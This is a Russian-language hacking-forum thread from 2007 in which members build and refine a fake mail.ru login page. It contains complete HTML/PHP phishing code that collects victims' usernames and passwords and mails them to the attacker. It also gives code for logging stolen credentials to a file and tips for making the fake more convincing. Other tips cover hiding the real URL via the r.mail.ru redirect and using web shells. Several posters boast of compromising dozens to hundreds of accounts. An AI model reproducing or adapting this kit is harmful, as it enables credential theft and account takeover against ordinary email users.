Просмотр полной версии : Фэйк странички mail.ru, имеется проблема
В общем есть фейк страничка mail.ru. Как сделать чтобы все данные оставались на сайте или отправлялись на мыло. Права записи в ту директорию не позволяют напрямую записывать. максимум 755. Что делать?
Google00
04.04.2007, 17:08
Права записи в ту директорию не позволяют напрямую записывать. максимум 755.
А что за хост?
Shunt
в принципе фек страничка наверное из ПХП значь там гдето можешь приписать функцию отправки на мыло
mail ("Кому", "Тема", "Текст сообщения", "Дополнительные заголовки")
Хост holm.ru. Страницу сделал в папке www. Когда нажимаю на ввод то вылезает страница агавы с надписью CGI script error
Ошибка исполнения CGI приложения
Русское описание
CGI приложение доступно на запись другим пользователям. Для выполнения оно должно иметь права 0755 или 0711.
Если права сделать как они просят, то вообще белый лист.
В общем понял что надо. Нужен простенький скрипт php чтобы при обращении к нему он отсылал нужные данные. Сейчас попробую поискать
Читай все, там есть ответы
http://forum.antichat.ru/thread34112.html
тебе на пхп файл права 777 не нужны, тебе их на тхт нужно выставить ;)
написал тому челу в приват у кого скрипт. В теме он удален.
на безплатных неканает!
юзай вэб шэл!
на безплатных неканает!
юзай вэб шэл!
Эт почему не канает :-\
Undernative
06.04.2007, 01:04
Писалось очнь давно и не так красиво как можно :)
Вставляешь это в свою фейк страницу и подгоняешь там как тебе надо
<IFRAME name=content align=middle
src="form.php"
frameBorder=0 width=390 scrolling=no
height=405>
</IFRAME></h1>
Это вобщем ссылаеться на form.php
Создаешь form.php и вписываешь это
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="form.files/dubie.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0
topMargin=0>
<FORM action=send.php method=post>
<P>Логин : <INPUT size=30 name=Name><tr><td class=form width=100%>
<td><select size=1 name=Domain class=long tabindex=2>
<option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option>
</select></td>
</table>
</td>
</tr></P>
<P>Пароль: <INPUT type=password
size=30 name=Email></P>
<BR><BR>
<CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML>
и еще файлик send.php в который вставляешь код и в нем вписываешь свой мыльник
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="register_files/dubie.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.3790.0" name=GENERATOR></HEAD>
<BODY style="FONT-SIZE: 10px; FONT-FAMILY: Verdna" bgColor=#ffffff
text=#ff0000 leftMargin=0 topMargin=0>
<?php
$info = "Name:\t$Name\n";
$info .= "Password:\t$Email\n";
$info .= "Message:\t$Message\n\n";
$send_to = "ТУТ ВПИСЫВАЕШЬ МЫЛО"; // Change this
$subject = "Новый пароль от лошка $Name"; // Change this
$website = "www.www.com"; // Change this
$headers = "From: Лохотрон в действии <> \n";
$headers .= "Reply-To: $email\n\n";
$send = mail($send_to, $subject, $info, $headers);
if($send == 1)
{
print ("<center><font size=2>Уважаемый пользователь $Name, Мы рады что вы подключили данную услугу. Спасибо за сотрудничество. Администрация </font></center></b>.<br><br><br><br><br><br><br><br><br><br>");
}
else
print ("Услуга подключена");
?>
</BODY>
</HTML>
Все сливаешь и тестишь,желательно юзать на holm.ru там ресче работает :/
Если захочешь изменить текст в файле send.php найдешь где и че мона поменять.Вобщем вот... НЕ судите,я как не знал ПХП так и не знаю ... просто это первое что написал,так как надо было ,а потом сам же забросил ...Время мало.
RemaerD, молодец что написал, но это очень геморойно.
Эт почему не канает :-\
нехватает прав
нехватает прав
Все хвотает, ставь доступ 777
nc.STRIEM
06.04.2007, 18:20
максимум 755. Что делать?
а я думал для записи в файл хватит 666 на этот файл!
мда..
RemaerD спасибо. ха-завтра попробую ;)
RemaerD +1
Спасибо за теги, всё работает. Как вам мой фейк (www.sitesite.h17.ru) , может что поправить надо? Уже взломал несколько мыльниц.
Делай фейк с этой страницы, а то я бы по втоей точно не прошел! http://win.mail.ru/cgi-bin/auth
В оригинале не "Логин", а "Имя". Список доменов не в том порядке идёт.
И текстовые поля сделай поближе друг к другу. Сделай ссылку "Забыли пароль".
Галочка "Чужой компьютер" тож не помешает.
А после нажатия кнопки "Войти" пусть юзеров перекидывает на настоящую страницу.
Текст с "подключением услуги..." лучше замени на чё-нить другое -)
И вообще, отсюда оформление\стиль возьми... http://win.mail.ru/cgi-bin/auth
В оригинале не "Логин", а "Имя". Список доменов не в том порядке идёт.
И текстовые поля сделай поближе друг к другу. Сделай ссылку "Забыли пароль".
Галочка "Чужой компьютер" тож не помешает.
А после нажатия кнопки "Войти" пусть юзеров перекидывает на настоящую страницу.
Текст с "подключением услуги..." лучше замени на чё-нить другое -)
И вообще, отсюда оформление\стиль возьми... http://win.mail.ru/cgi-bin/auth
Смотри поствыше ;)
Буду благодарен, если поможете мне это сделать, особенно про текстовые поля и перекидывания юзеров на настоящую страницу.
тебе саму страничку выдернуть надо! и свой пхп скрипт оптимизировать под неё
Undernative
07.04.2007, 21:08
http://dump.ru/files/6/6442175733/ - более правдоподобный вариант.
попробуйте кто нить подогнать ровно чтобы было ,если кому надо:/
Что то не получается у меня ничего. Хост hut.ru. Сделал вроде как написано, после это вылезает сообщение типо спасибо и тп. но на мыло ничего не приходит. Хотя наверно я что то не так делаю.
Linuxoid
08.04.2007, 02:06
Что то не получается у меня ничего. Хост hut.ru. Сделал вроде как написано, после это вылезает сообщение типо спасибо и тп. но на мыло ничего не приходит. Хотя наверно я что то не так делаю.
Хммм... А почему именно на мыло? Не проще будет в файл сохранить? :) Или сделать вообще изощренное сохранение в БД?
Пример как это счастье можно закатать в файл?
$msg = "$name $pass\n";
$write = fopen("file.txt","a");
fputs($write, $msg);
fclose($write);
Попробуй так сделать... ;) Функция mail() и у меня на HUT криво работала (если честно - у меян просто ничего не отправлялось... :))
Linuxoid, а можешь подробнее написать. Что то опять не идет. Выходит вообще на несуществующую страницу.
Вообще есть проблема с фэйком на mail.ru!!! когда жертва нажымает на ссыль, то там показывается истинный адрес вот для примера http://img123.imageshack.us/img123/4272/90482878hv0.th.jpg (http://img123.imageshack.us/my.php?image=90482878hv0.jpg)
Может у когото есть предложения как обойтись с этой проблемой
http://img123.imageshack.us/img123/4272/90482878hv0.th.jpg (http://img123.imageshack.us/my.php?image=90482878hv0.jpg)
Может у когото есть предложения как обойтись с этой проблемой
Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(
Я вообще не прячу ссылку , большинство пользователей при заходе на страницу даже не смотрят адрес. Благодоря фейку уже больше 10 штук взломал.
Вообще есть проблема с фэйком на mail.ru!!! когда жертва нажымает на ссыль, то там показывается истинный адрес вот для примера При заходе на твой фейк выскакивает реклама, которой быть не должно. На холме не пробовал размешять? там нет реклам.
Не могбы скинуть фейк своей страницы вместе с PHP скриптами. Твой выглядит правдоподобней
Undernative
11.04.2007, 21:40
Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(
Бугага =)
Скриптег в асе дам :) и кое что покажу ;)
Фэйк мне очень помог я при помощи него сломал порядка 400 Жертв!
теперь вот проблема с тем что адрес высвечивается!
А раньше такой проблемы не было?
А раньше такой проблемы не было?
Нет раньше не было появилась только недавно недели 2!
Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(
Я нашел решение ;) , надо чтобы фейк был в корне и в индес.пхп, потом просто делаеш ссылку ввида r.mail.ru/твой сайт в ASCII шифровке и усе ;)
попробуй редирект, типа
http://r.mail.ru/clb26353/www.yousite.ru
нет редирект не пускает!
нет редирект не пускает!
шифруй саму страничку! и пустить все как по маслу ;)
Легко! чтоб невыскакивало нада пробел поставить! где? сам подумай!
эту шнягу сразу решил!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot